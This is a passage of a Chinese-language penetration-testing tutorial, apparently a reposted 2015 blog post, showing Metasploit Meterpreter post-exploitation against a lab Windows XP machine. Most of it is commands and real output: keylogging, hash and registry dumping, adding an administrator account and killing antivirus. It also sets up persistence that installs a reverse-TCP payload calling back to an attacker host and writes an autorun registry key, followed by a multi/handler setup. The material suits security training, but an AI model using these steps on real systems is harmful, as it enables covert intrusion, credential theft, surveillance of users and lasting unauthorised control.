然后默默地去下载了XP SP3、安装IE7(刚安装好的XP SP3使用的是IE6)

t012ac2b9b8be04d57c.jpg

(安装、重启、重新操作了第一篇里的步骤 So 省略若干字….)

0x03 EXP successful:

终于,返回了successful!

t0153df974d9d0f5809.jpg

sessions:
sessions -i 1

t014c25005aec91d011.jpg

sysinfo ipconfig ps hashdump…

0x04常用命令:

截屏:

screenshot

t010e771c1ce04bf392.jpg

t01cee72574f9ee8ec1.jpg

键盘记录:

meterpreter > run post/windows/capture/keylog_recorder 
[*] Executing module against SPRITEKI-674621
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172.16.244.136_host.windows.key_879494.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...

t0132f846d28cf21bc3.jpg

 

 

执行cmd:

meterpreter>shell

 

添加用户:

net user add name password /add

 

添加用户到管理组:

net localgroup administrator name /add

 

因为是内网 开启3389也没什么意义了

http://p6.qhimg.com/t01af5a67aa87185a65.jpg

 

Kill 杀软

http://p8.qhimg.com/t01b1051511f357c543.jpg

meterpreter > run scraper
[*] New session on 172.16.244.136:1114...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg)
[*]  Cleaning HKU
[*] Completed processing on 172.16.244.136:1114...

t01d683cba9ba3e836a.jpg

 

控制持久化

meterpreter > run persistence -X -i 20 3376 -r 172.16.244.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129 LPORT=4444
[*] Persistent agent script is 609466 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[+] Agent executed with PID 1112
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI

t01da59aa8ef64c6f68.jpg

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPOTR
exploit

在meterpreter下使用Windows API编程,以弹Hello world窗示例

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

 

t01fcddd6d2070edf15.jpg

 

0x05更多Meterpreter的命令

参考:

Meterpreter后渗透攻击命令

Metasploit工具Meterpreter的命令速查表

0x06感谢

感谢全能Mickey牛和玄大:玄魂

雪碧 http://weibo.com/520613815

2015-03-19

原文:

http://bobao.360.cn/learning/detail/300.html

http://bobao.360.cn/learning/detail/312.html